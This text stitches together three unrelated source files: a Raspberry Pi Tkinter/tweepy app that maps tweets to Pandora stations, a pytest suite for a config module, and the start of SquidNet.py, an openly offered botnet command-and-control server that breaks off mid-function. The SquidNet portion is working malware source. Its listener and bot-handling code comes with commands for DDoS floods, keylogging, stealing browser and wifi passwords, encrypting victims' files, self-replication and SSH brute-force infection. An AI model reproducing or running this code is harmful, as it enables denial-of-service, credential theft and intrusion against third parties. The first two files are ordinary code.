class simpleapp_tk(Tkinter.Tk):
def __init__(self, parent):
Tkinter.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.entryVariable = Tkinter.StringVar()
self.entry = Tkinter.Entry(self, textvariable=self.entryVariable)
self.entry.grid(column=0, row=0, sticky='EW')
self.entry.bind("<Return>", self.OnPressEnter)
self.entryVariable.set(u"Enter Text Here")
button = Tkinter.Button(self, text=u"Click here",
command=self.OnButtonClick)
button.grid(column=1, row=0)
self.labelVariable = Tkinter.StringVar()
label = Tkinter.Label(self, textvariable=self.labelVariable,
anchor="nw", fg="white", bg="#335",
width=100, height=25,
justify='right',
cursor='gumby', font=("Times",20))
label.grid(column=0, row=1, columnspan=2, sticky='EW')
self.labelVariable.set(u"Hello")
self.grid_columnconfigure(0,weight=1)
self.resizable(True,True)
self.update()
self.geometry(self.geometry())
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def OnButtonClick(self):
i = 0
lst = []
string = ''
station_list = open('/home/pi/Desktop/pydora-test/DICT_SAVE', 'r')
for station in station_list:
lst.append(station)
string = string + station
i = 0
#print (string)
self.labelVariable.set(string)
'''
for i in range (len(lst)):
print (lst[i])
self.labelVariable.set(lst[i])
'''
'''
self.labelVariable.set(self.entryVariable.get()+"You clicked the button!")
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
'''
def OnPressEnter(self, event):
self.labelVariable.set(self.entryVariable.get()+"You pressed enter")
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def twitter():
def search(tweet):
print ("running")
client = get_client()
print("Connected")
search = (client.search(tweet,include_genre_stations=True))
print ("About to sort stations")
artists_score = 0
songs_score = 0
genre_score = 0
print(search)
if (len(search.artists) != 0):
artists_score = search.artists[0].score
artists_token = search.artists[0].token
artists_name = search.artists[0].artist
print("did artist search "+artists_name)
print("#1")
if (len(search.songs) != 0):
songs_score = search.songs[0].score
songs_token = search.songs[0].token
songs_name = search.songs[0].song_name
print("did song search " +songs_name)
print("#2")
if (len(search.genre_stations) != 0):
genre_score = search.genre_stations[0].score
genre_token = search.genre_stations[0].token
genre_name = search.genre_stations[0].station_name
print("did genre search "+genre_name)
print ("#3")
print("Done sorting")
if (artists_score > 80):
print("Returning artist: ", artists_name)
return artists_name
elif(genre_score > 80):
print("Returning genre: ", genre_name)
return genre_name
elif(songs_score > 80):
print("Retruning song: ", songs_name)
return songs_name
else:
print("Error: no station matches your request")
return ("error")
def get_client():
cfg_file = os.environ.get("PYDORA_CFG", "")
builder = clientbuilder.PydoraConfigFileBuilder(cfg_file)
if builder.file_exists:
return builder.build()
builder = clientbuilder.PianobarConfigFileBuilder()
if builder.file_exists:
return builder.build()
if not client:
Screen.print_error("No valid config found")
sys.exit(1)
def save_stuff(name, time, body, station):
#We want to keep name, timestamp, tweet, and the returned station in a file
string = ('\nname: ' + name + '\ntime: ' + time + '\ntweet: ' + body + 'station: ' + station)
f = open('/home/pi/Desktop/pydora-test/SAVE_FILE', 'a')
f.write('\n' + string)
s = open('/home/pi/Desktop/pydora-test/STATION_SAVE', 'a')
s.write(station + '\n')
#Acual main file. This is what runs when you execute the file
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
try:
redirect_url = auth.get_authorization_url()
except tweepy.TweepError:
print 'Error! Failed to get request token.'
request_token = auth.request_token
class StdOutListener(tweepy.StreamListener):
def on_data(self,data):
tweet = json.loads(data)
#print (tweet)
#this has a lot of valuable information
temp = tweet['text'] #prints out contents of tweet
lst = temp.split('#') #gets rid of #hemmingson
print lst
body = lst[0]
print body
#gets the user that sent the tweet
user = tweet.get('user')
name = user['screen_name']
#gets the time the tweet was created.
#Printed in tweet to prevent duplicate tweet errors
time = tweet['created_at']
time = time[:-10]
'''
#Grabs an image from local device and posts it
image = os.path.abspath('/home/pi/Desktop/something.png')
#prints out the screen name
#api.update_status("@" + name + "\nRetweet Test\n" + time + "/n")
api.update_with_media(image, status="@" + name + "\nRetweet Test\n" + time + "/n")
'''
station = search(body)
print ("Recieved the station")
print (station)
if station != ('error'):
save_stuff(name, time, body, station)
def on_error(self, status):
print (status)
l = StdOutListener()
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
print "Scanning for Hemmingson Playlist Requests"
stream = tweepy.Stream(auth, l)
stream.filter(track=['hemmingson'])
while(stream.running):
#time.sleep(0)
pass
def gui():
app = simpleapp_tk(None)
app.title('Test Stuff')
app.mainloop()
def sort():
SAVE_BUFFER = {}
def dict_to_string(dictionary):
total_string = ''
for key in dictionary:
string = key + " - - - - - - - - - - - - - - - - - - - - -"
string = string[:30]
count = str(dictionary[key])
total_string = total_string + string + count + '\n'
return total_string
def __init__():
if len(SAVE_BUFFER) == 0:
station_list = open('/home/pi/Desktop/pydora-test/STATION_SAVE', 'r')
for station in station_list:
#print (station)
temp = station[:len(station)-1]
if temp != '':
if temp in SAVE_BUFFER.keys():
SAVE_BUFFER[temp] = SAVE_BUFFER[temp] + 1
else:
SAVE_BUFFER[temp] = 1
while True:
__init__()
dictionary = open('/home/pi/Desktop/pydora-test/DICT_SAVE', 'w')
string = dict_to_string(SAVE_BUFFER)
#print (string)
dictionary.write(string)
time.sleep(2)
'''
while (True):
station_list = open('STATION_SAVE', 'r')
for station in station_list:
print station
time.sleep(20)
'''
def twitter_process():
twitter()
if (__name__ == "__main__"):
p = Process(target=twitter_process, args=())
q = Process(target=gui, args=())
r = Process(target=sort, args=())
p.start()
q.start()
r.start()
p.join()
q.join()
r.join()
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from taco.util.config import create_default_taco_config, initial_config_file, load_config, save_config
from taco.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aide in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_taco_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_taco_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_taco_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_taco_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_taco_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 55400
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== "ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb"
)
def test_load_config_exit_on_error(self, tmpdir):
"""
Call load_config() with an invalid path. Behavior should be dependent on the exit_on_error flag.
"""
root_path: Path = tmpdir
config_file_path: Path = root_path / "config" / "config.yaml"
# When: config file path points to a directory
mkdir(config_file_path)
# When: exit_on_error is True
# Expect: load_config will exit
with pytest.raises(SystemExit):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=True)
# When: exit_on_error is False
# Expect: load_config will raise an exception
with pytest.raises(ValueError):
_ = load_config(root_path=root_path, filename=config_file_path, exit_on_error=False)
def test_save_config(self, root_path_populated_with_config, default_config_dict):
"""
Test modifying the config and saving it to disk. The modified value(s) should be present after
calling load_config().
"""
root_path: Path = root_path_populated_with_config
config: Dict = copy.deepcopy(default_config_dict)
# When: modifying the config
config["harvester"]["farmer_peer"]["host"] = "oldmacdonald.eie.io"
# Sanity check that we didn't modify the default config
assert config["harvester"]["farmer_peer"]["host"] != default_config_dict["harvester"]["farmer_peer"]["host"]
# When: saving the modified config
save_config(root_path=root_path, filename="config.yaml", config_data=config)
# Expect: modifications should be preserved in the config read from disk
loaded: Dict = load_config(root_path=root_path, filename="config.yaml")
assert loaded["harvester"]["farmer_peer"]["host"] == "oldmacdonald.eie.io"
def test_multiple_writers(self, root_path_populated_with_config, default_config_dict):
"""
Test whether multiple readers/writers encounter data corruption. When using non-atomic operations
to write to the config, partial/incomplete writes can cause readers to yield bad/corrupt data.
Access to config.yaml isn't currently synchronized, so the best we can currently hope for is that
the file contents are written-to as a whole.
"""
# Artifically inflate the size of the default config. This is done to (hopefully) force
# save_config() to require multiple writes. When save_config() was using shutil.move()
# multiple writes were observed, leading to read failures when data was partially written.
default_config_dict["xyz"] = "x" * 32768
root_path: Path = root_path_populated_with_config
save_config(root_path=root_path, filename="config.yaml", config_data=default_config_dict)
num_workers: int = 30
args = list(map(lambda _: (root_path, default_config_dict), range(num_workers)))
# Spin-off several processes (not threads) to read and write config data. If any
# read failures are detected, the failing process will assert.
with Pool(processes=num_workers) as pool:
res = pool.starmap_async(run_reader_and_writer_tasks, args)
res.get(timeout=10)
|
SquidNet.py
|
import random, socket, time, sys, threading, random, os, hashlib, datetime, sqlite3
try:
"""This Module comes with Paramiko."""
from cryptography.fernet import Fernet
except:
pass
from optparse import OptionParser
"""This script is NOT Perfected(Still a WIP)! Notify me if there are any
issues with the script! I am open for DMs but please state that are a user
of my scripts, otherwise I will ignore you(I don't accept DMs from
strangers). My Discord: DrSquid™#7711. If you are unable to reach me,
you can open a discussion and I will respond to that in my repository."""
class ArguementParse:
"""Main Class for parsing command prompt arguements
when running the scripts."""
def __init__(self):
"""All arguements are optional! The botnet will start up without
arguements, however it will only be hosted on localhost.
The arguement parsing function will be utilized here."""
self.get_args()
def downloadNgrok(self):
"""Downloads Ngrok for windows. May need to add it for other OS's
but maybe in the future I will."""
print("[+] Downloading Ngrok.....\n")
if sys.platform == "win32":
batfile = open("getNgrok.bat", "w")
batfile.write(f"""
curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -o ngrok.zip
tar -xf {os.getcwd()}/ngrok.zip
""")
batfile.close()
os.startfile(batfile.name)
else:
output = os.popen("curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -o ngrok.zip")
print("[+] Downloading Ngrok.....")
print("[+] Ngrok zip file has been downloaded. Unzip it to extract ngrok!\n")
print("[+] Sign in with an ngrok account and you are good to go.")
print("[+] Run 'ngrok tcp 80' to start an Ngrok domain after finishing.")
sys.exit()
def usage(self):
"""Displays help for arguement parsing(good for first time users).
Allows the user to know what the arguements do as well as well as
how to use them."""
print(Botnet.log_logo(None))
print("""
[+] Option-Parsing Help:
[+] --ip, --ipaddr - Specifies the IP to host the Botnet on.
[+] --p, --port - Specifies the Port to host the Botnet on.
[+] --aU, --adminuser - Specify Botnet Admin Username.
[+] --aP, --adminpass - Specify Botnet Admin Password.
[+] --pL, --passlist - Specify a TXT File for SSH Brute-Forcing.
[+] Optional Arguements:
[+] --i, --info - Shows this message.
[+] --gN, --getngrok - Downloads Ngrok.
[+] --eK, --encryptkey - Specify encrypting key for bots.
[+] --eH, --externalhost - Specify an External Hostname for external connections.
[+] --eP, --externalport - Specify an External Port for external connections.
[+] Note: You need to have an Ngrok domain started for the ngrok arguements to have effect.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("""[+] python3 Squidnet.py --ip <ip> --p <port> --aU <adminuser> --aP <adminpass> --eK <encryptkey> --pL <passlist> --nH <ngrokhost> --nP <ngrokport>
[+] python3 Squidnet.py --i
[+] python3 Squidnet.py --gN""")
else:
print("""[+] Squidnet --ip <ip> --p <port> --aU <adminuser> --aP <adminpass> --eK <encryptkey> --pL <passlist> --nH <ngrokhost> --nP <ngrokport>
[+] Squidnet --i
[+] Squidnet --gN""")
sys.exit()
def get_args(self):
"""Arguement Parsing function for initiating the Botnet. Also adds
a bit of info for configuring settings in the Botnet to function the
best way that it can."""
opt = OptionParser()
opt.add_option("--ip", "--ipaddr", dest="ip")
opt.add_option("--p", "--port", dest="port")
opt.add_option("--aU", "--adminuser", dest="adminuser")
opt.add_option("--aP", "--adminpass", dest="adminpass")
opt.add_option("--eK", "--encryptkey", dest="key")
opt.add_option("--pL", "--passlist", dest="passfile")
opt.add_option("--eH", "--externalhost", dest="ngrokhost")
opt.add_option("--eP", "--externalport", dest="ngrokport")
opt.add_option("--gN", "--getngrok", dest="download", action="store_true")
opt.add_option("--i", "--info", dest="info", action="store_true")
arg, opti = opt.parse_args()
if arg.download is not None:
print(Botnet.log_logo(None))
self.downloadNgrok()
if arg.info is not None:
self.usage()
else:
pass
if arg.ip is None:
ip = "localhost"
else:
ip = arg.ip
if arg.port is None:
port = 80
else:
try:
port = int(arg.port)
if port == 8080:
port = 80
except:
Botnet.logo(None)
print("[+] Invalid port provided! Must be an integer!")
sys.exit()
if arg.adminuser is None:
adminuser = "admin"
else:
adminuser = arg.adminuser
if arg.adminpass is None:
adminpass = str(random.randint(0, 99999999999999999999999999999))
else:
adminpass = arg.adminpass
if arg.key is None:
try:
key = Fernet.generate_key()
except:
key = b'QAYEFKLQT469LdHWIs4ZG7xKrDr8JRzMTwNFvoQFILg='
else:
key = str(arg.key).encode()
if arg.passfile is None:
passfile = False
else:
passfile = arg.passfile
if arg.ngrokhost is not None:
ngrokhost = arg.ngrokhost
else:
ngrokhost = None
if arg.ngrokport is not None:
try:
ngrokport = int(arg.ngrokport)
except:
print(Botnet.log_logo(None))
print("[+] Invalid port provided! Must be an integer!")
sys.exit()
else:
ngrokport = None
self.webinterface = Web_Interface("localhost", 8080)
self.botnet = Botnet(ip, port, adminuser, adminpass, key, passfile, ngrokhost, ngrokport)
class Botnet:
"""Main Class Made for the BotNet. Everything important
and needed for the Botnet is located in this class."""
class NotSamePassException(Exception):
def __init__(self, msg=f"Configured Password is the the same as one in server txt file!"):
"""Little Error for the password configuration."""
self.msg = msg
super().__init__(self.msg)
def __init__(self, ip, port, name, passw, key, passwfile, ngroklink=None, ngrokport=None):
"""Initiation of the main script. Definition of socket server, ngrok hosts, logging, etc
are created. There are also definition of variables that are vital to the overall script
that are defined here as well. Logging is also started."""
self.ip = ip
self.port = int(port)
self.name = name
self.passw = passw
self.key = key
self.info = []
self.ssh_info = []
self.admininfo = []
self.bot_count = 0
self.passfilename = passwfile
self.logfile = "servlog.txt"
self.passfile = passwfile
self.log("\n" + self.log_logo() + "\n")
self.log("\n[(SERVER)]: Starting up server....")
if self.passfile != False:
try:
self.passwords = open(passwfile, 'r')
except:
self.logo()
print(f"[+] File '{passwfile}' is not in current directory.\n[+] Server is closing.....")
self.log("\n[(ERROR)]: Error starting up server - Brute-forcing file is not in directory!\n[(CLOSE)]: Server is closing.....")
sys.exit()
self.version = "8.0"
self.connportlist = []
self.conn_list = []
self.admin_conn = []
self.ips = []
self.ssh_bots = []
self.ssh_botlist = []
self.display_bots = []
self.admin_name = ""
self.admin_password = ""
self.savefile = False
self.botfile = ""
self.instruction = ""
try:
self.ngroklink = ngroklink
self.ngrokport = int(ngrokport)
tester = socket.gethostbyname(self.ngroklink)
except:
self.ngroklink = self.ip
self.ngrokport = self.port
self.listenforconn = True
self.botscript = self.bot_script()
self.working = False
self.obtaininghistory = False
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.serv.bind((ip, port))
self.working = True
except Exception as e:
self.working = False
self.logo()
print("[+] The Server cannot be started! Check the logs for more info.")
self.log(f"\n[(ERROR)]: Unable to bind IP and Port due to: {e}")
sys.exit()
if self.working:
self.cwd = os.getcwd()
self.listener = threading.Thread(target=self.listen)
self.listener.start()
self.logo()
self.savefile = False
self.displaykeys = False
self.welcomemsg = """
[(SERVER)]:
[+] List of Commands:
[+] !help - Displays this message.
[+] !getconninfo - Displays info about all of the connections.
[+] Commands for TCP Botnet:
[+] !httpflood [website] [delay] - Denial Of Services the website provided.
[+] !tcpflood [ip] [port] [delay] [size] - Floods the target with TCP Packets.
[+] !udpflood [ip] [port] [delay] [size] - Floods the target with UDP Packets.
[+] !openfile [filename] - Opens a file in the bot working directory.
[+] !changedir [dir] - Changes the working directory of the Bot.
[+] !rmdir [folder] - Removes a folder in the bot working directory.
[+] !rmfile [file] - Removes a file in the bot working directory.
[+] !encfile [file] - Encrypts a provided file in the bot working directory
[+] !decfile [file] - Decrypts a provided file in the bot working directory
[+] !viewfilecontent [file] - Gets the content of the files provided.
[+] !dwnldfile [src] [file] - Downloads a file from the internet onto the bot computer.
[+] !mkdir [dir] - Makes a folder in the bot current directory.
[+] !gotowebsite [url] - Takes the bot to the provided website.
[+] !mkfile [filename] - Creates a file in the bot working directory.
[+] !editfile [file] - Opens a file in writing mode for the bots.
[+] !stopedit - Closes file editor on bots and returns to normal.
[+] !keylog [display?] - Sets up keylogging on the bots(put True in 2nd arg to display it, put nothing to not).
[+] !stopkeylog - Stops any keylogging on the Botnet.
[+] !encdir - Encrypts all files in the bot working directory
[+] !decdir - Decrypts all files in the bot working directory
[+] !botcount - Gets the amount of connected bots.
[+] !stopatk - Stops any ongoing DDoS Attacks in the Botnet.
[+] !changedirdesktop - Sets the bot working directory to their Desktop.
[+] !listdir - Lists the files in the bot working directories.
[+] !resettoken - Resets the token and changes it to a new token
[+] !getinfo - Gets the OS, cwd, IP, and username of the bots.
[+] !getip - Gets the IP of the bots
[+] !getwifi - Obtains the wifi names and passwords of the bots(Windows only).
[+] !savefile - Obtains a file from the bots directory.
[+] !getcwd - Gets the bots working directory.
[+] !getos - Gets the OS Of the bots.
[+] !getpasswords - Gets the stored browser passwords of the bots(Windows only).
[+] !rickroll - Rick Rolls the Bots.
[+] !getchromehistory - Obtains the chrome history of the bots(it needs to already be in the server txt file).
[+] !cloneself - Self replicates the Bot scripts in the bots.
[+] Commands for SSH Botnet:
[+] !infect [ip] [user] - Brute forces login for provided ip and username.
[+] !sshlogin [ip] [user] [pass] - Logs in the ip with the provided username and password.
[+] !listsshbots - Lists all SSH Bots.
[+] Any other commands will be made into cmd commands.
"""
item = f"\n[(SERVER)]: Server started: {datetime.datetime.today()}\n[(SERVER)]: Successfully started server on: {self.ngroklink}:{self.ngrokport}\n[(SERVER)]: Listening for connections.....\n[(SERVER)]: Encryption key used: {self.key}"
self.log(item)
print(f"\n[+] Hosting Server at {self.ngroklink}:{self.ngrokport}")
print("[+] Web-Interface For More Info: http://127.0.0.1:8080")
print("[+] Botnet is Up! Listening for connections.....\n")
print(f"[+] This Server is being logged!\n[+] Server Log File: {self.logfile}")
print(f"\n[+] Use this token when encrypting!: {key}")
print("[+] Notice that this token will be used if encrypting files(probably save it).")
self.usage()
self.instructor = threading.Thread(target=self.instruct)
self.instructor.start()
def log_logo(self=None):
"""Logo of this script."""
logo = """
_____ _ _ _ _ _ ___ ___
/ ____| (_) | | \ | | | | / _ \ / _ \
| (___ __ _ _ _ _ __| | \| | ___| |_ __ _| (_) | | | |
\___ \ / _` | | | | |/ _` | . ` |/ _ \ __| \ \ / /> _ <| | | |
____) | (_| | |_| | | (_| | |\ | __/ |_ \ V /| (_) | |_| |
|_____/ \__, |\__,_|_|\__,_|_| \_|\___|\__| \_/ \___(_)___/
| |
|_|
TCP and SSH Botnet Hybrid Command and Control Server By DrSquid"""
return logo
def logo(self):
"""Prints the logo of this script."""
print(self.log_logo())
def usage(self):
"""This displays the list of commands on the server that can be sent to the bots."""
print("\n[+] Commands:\n")
print("[+] !help - Displays all of the commands.")
print("[+] !whatsnew - Displays all new features.")
print("[+] !getconninfo - Displays info about all of the connections.")
print(
"[+] !genadminscript - Generates the admin script for remote connections to this server.")
print(
"[+] !genscript - Generates the bot python script needed to connect to this server.")
print("[+] !clear - Clears the output.")
print(
"[+] !togglelisten - Toggles whether to stop accepting connections or start accepting them.")
print("[+] !kick [hostname] [srcport] - Kicks a client off of the Botnet.")
print("\n[+] Commands for TCP Botnet:\n")
print("[+] !httpflood [website] [delay] - Denial Of Services the website provided.")
print("[+] !tcpflood [ip] [port] [delay] [size] - Floods the target with TCP Packets.")
print("[+] !udpflood [ip] [port] [delay] [size] - Floods the target with UDP Packets.")
print("[+] !openfile [filename] - Opens a file in the bot working directory.")
print("[+] !changedir [dir] - Changes the working directory of the Bot.")
print("[+] !rmdir [folder] - Removes a folder in the bot working directory.")
print("[+] !rmfile [file] - Removes a file in the bot working directory.")
print("[+] !encfile [file] - Encrypts a provided file in the bot working directory")
print("[+] !decfile [file] - Decrypts a provided file in the bot working directory")
print("[+] !viewfilecontent [file] - Gets the content of the files provided.")
print("[+] !dwnldfile [src] [file] - Downloads a file from the internet onto the bot computer.")
print("[+] !mkdir [dir] - Makes a folder in the bot current directory.")
print("[+] !gotowebsite [url] - Takes the bot to the provided website.")
print("[+] !mkfile [filename] - Creates a file in the bot working directory.")
print("[+] !editfile [file] - Opens a file in writing mode for the bots.")
print("[+] !stopedit - Closes file editor on bots and returns to normal.")
print(
"[+] !keylog [display?] - Sets up keylogging on the bots(put True in 2nd arg to display it, put nothing to not).")
print("[+] !stopkeylog - Stops any keylogging on the Botnet.")
print("[+] !encdir - Encrypts all files in the bot working directory")
print("[+] !decdir - Decrypts all files in the bot working directory")
print("[+] !botcount - Gets the amount of connected bots.")
print("[+] !stopatk - Stops any ongoing DDoS Attacks in the Botnet.")
print("[+] !changedirdesktop - Sets the bot working directory to their Desktop.")
print("[+] !listdir - Lists the files in the bot working directories.")
print("[+] !resettoken - Resets the token and changes it to a new token")
print("[+] !getinfo - Gets the OS, cwd, IP, and username of the bots.")
print("[+] !getip - Gets the IP of the bots")
print(
"[+] !getwifi - Obtains the wifi names and passwords of the bots(Windows only).")
print("[+] !savefile - Obtains a file from the bots directory.")
print("[+] !getcwd - Gets the bots working directory.")
print("[+] !getos - Gets the OS Of the bots.")
print("[+] !getpasswords - Gets the stored browser passwords of the bots(Windows only).")
print("[+] !rickroll - Rick Rolls the Bots.")
print("[+] !cloneself - Self replicates the Bot scripts in the bots.")
print(
"[+] !getchromehistory - Check the bots chrome history(Hehehe....)(it will save in an external file).")
print("\n[+] Commands for SSH Botnet:\n")
print("[+] !infect [ip] [user] - Brute forces login for the provided ip and username.")
print("[+] !inject [file] - Opens FTP and injects a file into an infected host.")
print("[+] !sshlogin [ip] [user] [pass] - Logs in the ip with the provided username and password.")
print("[+] !listsshbots - Lists all SSH Bots.")
print("\n[+] Any other commands will be made into cmd commands.\n")
def listen(self):
"""This function listens for connections from admins and bots alike.
The first message recieved will be interpreted as the name of the device
and it will displayed for the Admins to see. A thread is created for the
handling of the connection. If variable 'self.listenforconn' is False, then
the server will not listen for connections."""
while True:
try:
if self.listenforconn:
flag = 0
self.serv.listen(1)
c, ip = self.serv.accept()
if not self.listenforconn:
c.close()
else:
msg = c.recv(1024).decode().strip()
self.bot_count += 1
split_msg = msg.split()
hostname = split_msg[0]
try:
ipaddr = str(split_msg[1])
except:
ipaddr = "Unknown"
try:
user = str(split_msg[2])
except:
user = "Unknown"
try:
connection = str(ip[1])
except:
connection = "Unknown"
try:
opsys = split_msg[3]
except:
opsys = "Unknown"
self.connportlist.append(hostname + " " + str(ip[1]) + " " + str(c))
self.log(f"""
[({hostname})---->(SERVER)]:
[+] HOSTNAME: {hostname}
[+] IPADDR : {ipaddr}
[+] USERNAME: {user}
[+] CONN : {connection}
[+] OS : {opsys}""")
info = str(hostname + " " + ipaddr + " " + user + " " + connection + " " + opsys)
self.info.append(info)
print(f"\n[!] {hostname} has connected to the botnet.")
self.log(f"\n[(CONNECTION)]: {hostname} has connected to the botnet.")
handle = threading.Thread(target=self.handler, args=(c, hostname, self.bot_count, info))
handle.start()
else:
pass
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
def log(self, msg):
"""Logs server output."""
try:
self.serverlog = open(self.logfile, 'r')
contents = self.serverlog.read()
self.serverlog.close()
self.serverlog = open(self.logfile, 'w')
self.serverlog.write(contents)
self.serverlog.write(msg)
self.serverlog.close()
except FileNotFoundError:
self.serverlog = open(self.logfile, "w")
self.serverlog.write(msg)
self.serverlog.close()
except:
self.serverlog = open(self.logfile, 'rb')
contents = self.serverlog.read()
self.serverlog.close()
self.serverlog = open(self.logfile, 'wb')
self.serverlog.write(contents)
self.serverlog.write(msg)
self.serverlog.close()
def wrap_item(self, word, size):
"""Wraps the items from the conn-list and aligns it in the table."""
item = word
while len(item) + 2 <= size - 1:
item += " "
return item
def gen_conntable(self):
"""Generates the connection table with info about each connection.
This is similar to the information displayed in the Web-Interface."""
result = """
Regular Connections:
______________________________________________________________________________________
| | | | | |
| Hostname | IP Address | Username | Connection | OS |
|_______________________|__________________|______________|______________|___________|"""
for info in self.info:
split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}| {self.wrap_item(split_info[3], 15)}| {self.wrap_item(split_info[4], 12)}|"
result += "\n|_______________________|__________________|______________|______________|___________|"
result += """
Admin Connections:
______________________________________________________________________________________
| | | | | |
| Hostname | IP Address | Username | Connection | OS |
|_______________________|__________________|______________|______________|___________|"""
for info in self.admininfo:
split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}| {self.wrap_item(split_info[3], 15)}| {self.wrap_item(split_info[4], 12)}|"
result += "\n|_______________________|__________________|______________|______________|___________|"
result += """
SSH Connections:
________________________________________________________
| | | |
| Hostname | IP Address | Password |
|_______________________|_______________|______________|"""
for info in self.ssh_info:
split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}|"
result += "\n|_______________________|_______________|______________|\n"
return result
def handler(self, c, hostname, number, info):
"""Function recieves packets from the connections. This is needed for clients
to send packets to the botnet so the Admin can see what the Bots are sending.
This is needed also for password grabbing and information obtaining. This
function is also important for admin connections as they need to send and
recieve packets. It also handles the connections, and keeps them alive."""
admin = False
isbot = False
while True:
try:
msg = c.recv(65500)
if self.savefile or self.obtaininghistory:
pass
else:
try:
msg = msg.decode()
except Exception as e:
msg = str(msg)
self.log(f"\n[(ERROR)]: {str(e)}")
if not isbot:
if msg == "!CLIENTLOG":
isbot = True
msgtoadmin = f"[(SERVER)]: {hostname} is recognized as part of the Botnet."
self.log("\n" + msgtoadmin)
print(f"[!] {hostname} is recognized as part of the Botnet.")
for adm in self.admin_conn:
try:
adm.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
self.conn_list.append(c)
else:
print(f"[!] WARNING: {hostname} IS NOT PART OF THE BOTNET.\n[!] Closing Connection.....")
c.close()
break
if isbot:
if not admin:
if str(type(msg)) == "str":
if msg.startswith('!login'):
msg_split = msg.split()
name = msg_split[1]
passw = msg_split[2]
try:
passw = passw.encode()
